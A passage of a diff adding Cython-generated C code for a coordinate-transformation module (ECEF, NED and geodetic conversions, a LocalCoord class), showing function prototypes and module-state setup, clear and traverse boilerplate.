*__pyx_v_self, PyObject *__pyx_v_ecef); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_8ned2ecef_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_ned); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_10geodetic2ned_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_geodetic); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_12ned2geodetic_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_ned); /* proto */ +static void __pyx_pf_6common_15transformations_15transformations_10LocalCoord_14__dealloc__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_16__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_18__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_6common_15transformations_15transformations_LocalCoord(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_7cpython_4type_type; + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_5numpy_dtype; + PyTypeObject *__pyx_ptype_5numpy_flatiter; + PyTypeObject *__pyx_ptype_5numpy_broadcast; + PyTypeObject *__pyx_ptype_5numpy_ndarray; + PyTypeObject *__pyx_ptype_5numpy_generic; + PyTypeObject *__pyx_ptype_5numpy_number; + PyTypeObject *__pyx_ptype_5numpy_integer; + PyTypeObject *__pyx_ptype_5numpy_signedinteger; + PyTypeObject *__pyx_ptype_5numpy_unsignedinteger; + PyTypeObject *__pyx_ptype_5numpy_inexact; + PyTypeObject *__pyx_ptype_5numpy_floating; + PyTypeObject *__pyx_ptype_5numpy_complexfloating; + PyTypeObject *__pyx_ptype_5numpy_flexible; + PyTypeObject *__pyx_ptype_5numpy_character; + PyTypeObject *__pyx_ptype_5numpy_ufunc; + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_6common_15transformations_15transformations_LocalCoord; + #endif + PyTypeObject *__pyx_ptype_6common_15transformations_15transformations_LocalCoord; + PyObject *__pyx_n_s_AssertionError; + PyObject *__pyx_n_s_ImportError; + PyObject *__pyx_n_s_LocalCoord; + PyObject *__pyx_n_s_LocalCoord___reduce_cython; + PyObject *__pyx_n_s_LocalCoord___setstate_cython; + PyObject *__pyx_n_s_LocalCoord_ecef2ned_single; + PyObject *__pyx_n_s_LocalCoord_from_ecef; + PyObject *__pyx_n_s_LocalCoord_from_geodetic; + PyObject *__pyx_n_s_LocalCoord_geodetic2ned_single; + PyObject *__pyx_n_s_LocalCoord_ned2ecef_single; + PyObject *__pyx_n_s_LocalCoord_ned2geodetic_single; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_n_s__3; + PyObject *__pyx_n_s__42; + PyObject *__pyx_n_s_array; + PyObject *__pyx_n_s_asfortranarray; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_cls; + PyObject *__pyx_kp_s_common_transformations_transform; + PyObject *__pyx_n_s_common_transformations_transform_2; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_double; + PyObject *__pyx_n_s_dtype; + PyObject *__pyx_n_s_e; + PyObject *__pyx_n_s_ecef; + PyObject *__pyx_n_s_ecef2geodetic_single; + PyObject *__pyx_n_s_ecef2ned_matrix; + PyObject *__pyx_n_s_ecef2ned_single; + PyObject *__pyx_n_s_ecef_euler_from_ned_single; + PyObject *__pyx_n_s_ecef_init; + PyObject *__pyx_n_s_ecef_pose; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_euler; + PyObject *__pyx_n_s_euler2quat_single; + PyObject *__pyx_n_s_euler2rot_single; + PyObject *__pyx_n_s_from_ecef; + PyObject *__pyx_n_s_from_geodetic; + PyObject *__pyx_n_s_g; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_geodetic; + PyObject *__pyx_n_s_geodetic2ecef_single; + PyObject *__pyx_n_s_geodetic2ned_single; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_init; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_n; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_ned; + PyObject *__pyx_n_s_ned2ecef_matrix; + PyObject *__pyx_n_s_ned2ecef_single; + PyObject *__pyx_n_s_ned2geodetic_single; + PyObject *__pyx_n_s_ned_euler_from_ecef_single; + PyObject *__pyx_n_s_ned_pose; + PyObject *__pyx_n_s_np; + PyObject *__pyx_n_s_numpy; + PyObject *__pyx_kp_u_numpy_core_multiarray_failed_to; + PyObject *__pyx_kp_u_numpy_core_umath_failed_to_impor; + PyObject *__pyx_n_s_pitch; + PyObject *__pyx_n_s_pose; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_q; + PyObject *__pyx_n_s_quat; + PyObject *__pyx_n_s_quat2euler_single; + PyObject *__pyx_n_s_quat2rot_single; + PyObject *__pyx_n_s_r; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_roll; + PyObject *__pyx_n_s_rot; + PyObject *__pyx_n_s_rot2euler_single; + PyObject *__pyx_n_s_rot2quat_single; + PyObject *__pyx_n_s_rot_matrix; + PyObject *__pyx_n_s_self; + PyObject *__pyx_kp_s_self_lc_cannot_be_converted_to_a; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_yaw; + PyObject *__pyx_tuple_; + PyObject *__pyx_tuple__2; + PyObject *__pyx_tuple__4; + PyObject *__pyx_tuple__6; + PyObject *__pyx_tuple__8; + PyObject *__pyx_tuple__10; + PyObject *__pyx_tuple__12; + PyObject *__pyx_tuple__14; + PyObject *__pyx_tuple__16; + PyObject *__pyx_tuple__18; + PyObject *__pyx_tuple__20; + PyObject *__pyx_tuple__22; + PyObject *__pyx_tuple__24; + PyObject *__pyx_tuple__26; + PyObject *__pyx_tuple__28; + PyObject *__pyx_tuple__30; + PyObject *__pyx_tuple__32; + PyObject *__pyx_tuple__34; + PyObject *__pyx_tuple__36; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__40; + PyObject *__pyx_codeobj__5; + PyObject *__pyx_codeobj__7; + PyObject *__pyx_codeobj__9; + PyObject *__pyx_codeobj__11; + PyObject *__pyx_codeobj__13; + PyObject *__pyx_codeobj__15; + PyObject *__pyx_codeobj__17; + PyObject *__pyx_codeobj__19; + PyObject *__pyx_codeobj__21; + PyObject *__pyx_codeobj__23; + PyObject *__pyx_codeobj__25; + PyObject *__pyx_codeobj__27; + PyObject *__pyx_codeobj__29; + PyObject *__pyx_codeobj__31; + PyObject *__pyx_codeobj__33; + PyObject *__pyx_codeobj__35; + PyObject *__pyx_codeobj__37; + PyObject *__pyx_codeobj__39; + PyObject *__pyx_codeobj__41; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7cpython_4type_type); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_dtype); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flatiter); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_broadcast); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ndarray); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_generic); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_number); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_integer); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_signedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_inexact); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_floating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_complexfloating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flexible); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_character); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ufunc); + Py_CLEAR(clear_module_state->__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + Py_CLEAR(clear_module_state->__pyx_type_6common_15transformations_15transformations_LocalCoord); + Py_CLEAR(clear_module_state->__pyx_n_s_AssertionError); + Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord_ecef2ned_single); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord_from_ecef); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord_from_geodetic); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord_geodetic2ned_single); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord_ned2ecef_single); + Py_CLEAR(clear_module_state->__pyx_n_s_LocalCoord_ned2geodetic_single); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_n_s__3); + Py_CLEAR(clear_module_state->__pyx_n_s__42); + Py_CLEAR(clear_module_state->__pyx_n_s_array); + Py_CLEAR(clear_module_state->__pyx_n_s_asfortranarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_cls); + Py_CLEAR(clear_module_state->__pyx_kp_s_common_transformations_transform); + Py_CLEAR(clear_module_state->__pyx_n_s_common_transformations_transform_2); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_double); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype); + Py_CLEAR(clear_module_state->__pyx_n_s_e); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef2geodetic_single); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef2ned_matrix); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef2ned_single); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef_euler_from_ned_single); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef_init); + Py_CLEAR(clear_module_state->__pyx_n_s_ecef_pose); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_euler); + Py_CLEAR(clear_module_state->__pyx_n_s_euler2quat_single); + Py_CLEAR(clear_module_state->__pyx_n_s_euler2rot_single); + Py_CLEAR(clear_module_state->__pyx_n_s_from_ecef); + Py_CLEAR(clear_module_state->__pyx_n_s_from_geodetic); + Py_CLEAR(clear_module_state->__pyx_n_s_g); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_geodetic); + Py_CLEAR(clear_module_state->__pyx_n_s_geodetic2ecef_single); + Py_CLEAR(clear_module_state->__pyx_n_s_geodetic2ned_single); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_init); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_n); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_ned); + Py_CLEAR(clear_module_state->__pyx_n_s_ned2ecef_matrix); + Py_CLEAR(clear_module_state->__pyx_n_s_ned2ecef_single); + Py_CLEAR(clear_module_state->__pyx_n_s_ned2geodetic_single); + Py_CLEAR(clear_module_state->__pyx_n_s_ned_euler_from_ecef_single); + Py_CLEAR(clear_module_state->__pyx_n_s_ned_pose); + Py_CLEAR(clear_module_state->__pyx_n_s_np); + Py_CLEAR(clear_module_state->__pyx_n_s_numpy); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_CLEAR(clear_module_state->__pyx_n_s_pitch); + Py_CLEAR(clear_module_state->__pyx_n_s_pose); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_q); + Py_CLEAR(clear_module_state->__pyx_n_s_quat); + Py_CLEAR(clear_module_state->__pyx_n_s_quat2euler_single); + Py_CLEAR(clear_module_state->__pyx_n_s_quat2rot_single); + Py_CLEAR(clear_module_state->__pyx_n_s_r); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_roll); + Py_CLEAR(clear_module_state->__pyx_n_s_rot); + Py_CLEAR(clear_module_state->__pyx_n_s_rot2euler_single); + Py_CLEAR(clear_module_state->__pyx_n_s_rot2quat_single); + Py_CLEAR(clear_module_state->__pyx_n_s_rot_matrix); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_kp_s_self_lc_cannot_be_converted_to_a); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_yaw); + Py_CLEAR(clear_module_state->__pyx_tuple_); + Py_CLEAR(clear_module_state->__pyx_tuple__2); + Py_CLEAR(clear_module_state->__pyx_tuple__4); + Py_CLEAR(clear_module_state->__pyx_tuple__6); + Py_CLEAR(clear_module_state->__pyx_tuple__8); + Py_CLEAR(clear_module_state->__pyx_tuple__10); + Py_CLEAR(clear_module_state->__pyx_tuple__12); + Py_CLEAR(clear_module_state->__pyx_tuple__14); + Py_CLEAR(clear_module_state->__pyx_tuple__16); + Py_CLEAR(clear_module_state->__pyx_tuple__18); + Py_CLEAR(clear_module_state->__pyx_tuple__20); + Py_CLEAR(clear_module_state->__pyx_tuple__22); + Py_CLEAR(clear_module_state->__pyx_tuple__24); + Py_CLEAR(clear_module_state->__pyx_tuple__26); + Py_CLEAR(clear_module_state->__pyx_tuple__28); + Py_CLEAR(clear_module_state->__pyx_tuple__30); + Py_CLEAR(clear_module_state->__pyx_tuple__32); + Py_CLEAR(clear_module_state->__pyx_tuple__34); + Py_CLEAR(clear_module_state->__pyx_tuple__36); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__40); + Py_CLEAR(clear_module_state->__pyx_codeobj__5); + Py_CLEAR(clear_module_state->__pyx_codeobj__7); + Py_CLEAR(clear_module_state->__pyx_codeobj__9); + Py_CLEAR(clear_module_state->__pyx_codeobj__11); + Py_CLEAR(clear_module_state->__pyx_codeobj__13); + Py_CLEAR(clear_module_state->__pyx_codeobj__15); + Py_CLEAR(clear_module_state->__pyx_codeobj__17); + Py_CLEAR(clear_module_state->__pyx_codeobj__19); + Py_CLEAR(clear_module_state->__pyx_codeobj__21); + Py_CLEAR(clear_module_state->__pyx_codeobj__23); + Py_CLEAR(clear_module_state->__pyx_codeobj__25); + Py_CLEAR(clear_module_state->__pyx_codeobj__27); + Py_CLEAR(clear_module_state->__pyx_codeobj__29); + Py_CLEAR(clear_module_state->__pyx_codeobj__31); + Py_CLEAR(clear_module_state->__pyx_codeobj__33); + Py_CLEAR(clear_module_state->__pyx_codeobj__35); + Py_CLEAR(clear_module_state->__pyx_codeobj__37); + Py_CLEAR(clear_module_state->__pyx_codeobj__39); + Py_CLEAR(clear_module_state->__pyx_codeobj__41); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7cpython_4type_type); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_dtype); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flatiter); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_broadcast); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ndarray); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_generic); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_number); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_integer); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_signedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_inexact); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_floating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_complexfloating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flexible); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_character); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ufunc); + Py_VISIT(traverse_module_state->__pyx_ptype_6common_15transformations_15transformations_LocalCoord); + Py_VISIT(traverse_module_state->__pyx_type_6common_15transformations_15transformations_LocalCoord); + Py_VISIT(traverse_module_state->__pyx_n_s_AssertionError); + Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord_ecef2ned_single); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord_from_ecef); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord_from_geodetic); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord_geodetic2ned_single); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord_ned2ecef_single); + Py_VISIT(traverse_module_state->__pyx_n_s_LocalCoord_ned2geodetic_single); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_n_s__3); + Py_VISIT(traverse_module_state->__pyx_n_s__42); + Py_VISIT(traverse_module_state->__pyx_n_s_array); + Py_VISIT(traverse_module_state->__pyx_n_s_asfortranarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_cls); + Py_VISIT(traverse_module_state->__pyx_kp_s_common_transformations_transform); + Py_VISIT(traverse_module_state->__pyx_n_s_common_transformations_transform_2); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_double); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype); + Py_VISIT(traverse_module_state->__pyx_n_s_e); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef2geodetic_single); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef2ned_matrix); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef2ned_single); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef_euler_from_ned_single); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef_init); + Py_VISIT(traverse_module_state->__pyx_n_s_ecef_pose); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_euler); + Py_VISIT(traverse_module_state->__pyx_n_s_euler2quat_single); + Py_VISIT(traverse_module_state->__pyx_n_s_euler2rot_single); + Py_VISIT(traverse_module_state->__pyx_n_s_from_ecef); + Py_VISIT(traverse_module_state->__pyx_n_s_from_geodetic); + Py_VISIT(traverse_module_state->__pyx_n_s_g); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_geodetic); + Py_VISIT(traverse_module_state->__pyx_n_s_geodetic2ecef_single); + Py_VISIT(traverse_module_state->__pyx_n_s_geodetic2ned_single); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_init); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_n); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_ned); + Py_VISIT(traverse_module_state->__pyx_n_s_ned2ecef_matrix); + Py_VISIT(traverse_module_state->__pyx_n_s_ned2ecef_single); + Py_VISIT(traverse_module_state->__pyx_n_s_ned2geodetic_single); + Py_VISIT(traverse_module_state->__pyx_n_s_ned_euler_from_ecef_single); + Py_VISIT(traverse_module_state->__pyx_n_s_ned_pose); + Py_VISIT(traverse_module_state->__pyx_n_s_np); + Py_VISIT(traverse_module_state->__pyx_n_s_numpy); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_VISIT(traverse_module_state->__pyx_n_s_pitch); + Py_VISIT(traverse_module_state->__pyx_n_s_pose); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_q); + Py_VISIT(traverse_module_state->__pyx_n_s_quat); + Py_VISIT(traverse_module_state->__pyx_n_s_quat2euler_single); + Py_VISIT(traverse_module_state->__pyx_n_s_quat2rot_single); + Py_VISIT(traverse_module_state->__pyx_n_s_r); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_roll); + Py_VISIT(traverse_module_state->__pyx_n_s_rot); + Py_VISIT(traverse_module_state->__pyx_n_s_rot2euler_single); + Py_VISIT(traverse_module_state->__pyx_n_s_rot2quat_single); + Py_VISIT(traverse_module_state->__pyx_n_s_rot_matrix); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_kp_s_self_lc_cannot_be_converted_to_a); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_yaw); + Py_VISIT(traverse_module_state->__pyx_tuple_); + Py_VISIT(traverse_module_state->__pyx_tuple__2); + Py_VISIT(traverse_module_state->__pyx_tuple__4); + Py_VISIT(traverse_module_state->__pyx_tuple__6); + Py_VISIT(traverse_module_state->__pyx_tuple__8); + Py_VISIT(traverse_module_state->__pyx_tuple__10); + Py_VISIT(traverse_module_state->__pyx_tuple__12); + Py_VISIT(traverse_module_state->__pyx_tuple__14); + Py_VISIT(traverse_module_state->__pyx_tuple__16); + Py_VISIT(traverse_module_state->__pyx_tuple__18); + Py_VISIT(traverse_module_state->__pyx_tuple__20); + Py_VISIT(traverse_module_state->__pyx_tuple__22); + Py_VISIT(traverse_module_state->__pyx_tuple__24); + Py_VISIT(traverse_module_state->__pyx_tuple__26); + Py_VISIT(traverse_module_state->__pyx_tuple__28); + Py_VISIT(traverse_module_state->__pyx_tuple__30); + Py_VISIT(traverse_module_state->__pyx_tuple__32); + Py_VISIT(traverse_module_state->__pyx_tuple__34); + Py_VISIT(traverse_module_state->__pyx_tuple__36); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__40); + Py_VISIT(traverse_module_state->__pyx_codeobj__5); + Py_VISIT(traverse_module_state->__pyx_codeobj__7); + Py_VISIT(traverse_module_state->__pyx_codeobj__9); + Py_VISIT(traverse_module_state->__pyx_codeobj__11); + Py_VISIT(traverse_module_state->__pyx_codeobj__13); + Py_VISIT(traverse_module_state->__pyx_codeobj__15); + Py_VISIT(traverse_module_state->__pyx_codeobj__17); + Py_VISIT(traverse_module_state->__pyx_codeobj__19); + Py_VISIT(traverse_module_state->__pyx_codeobj__21); + Py_VISIT(traverse_module_state->__pyx_codeobj__23); + Py_VISIT(traverse_module_state->__pyx_codeobj__25); + Py_VISIT(traverse_module_state->__pyx_codeobj__27); + Py_VISIT(traverse_module_state->__pyx_codeobj__29); + Py_VISIT(traverse_module_state->__pyx_codeobj__31); + Py_VISIT(traverse_module_state->__pyx_codeobj__33); + Py_VISIT(traverse_module_state->__pyx_codeobj__35); + Py_VISIT(traverse_module_state->__pyx_codeobj__37); + Py_VISIT(traverse_module_state->__pyx_codeobj__39); + Py_VISIT(traverse_module_state->__pyx_codeobj__41); + return 0; +} +#endif +/* #### Code 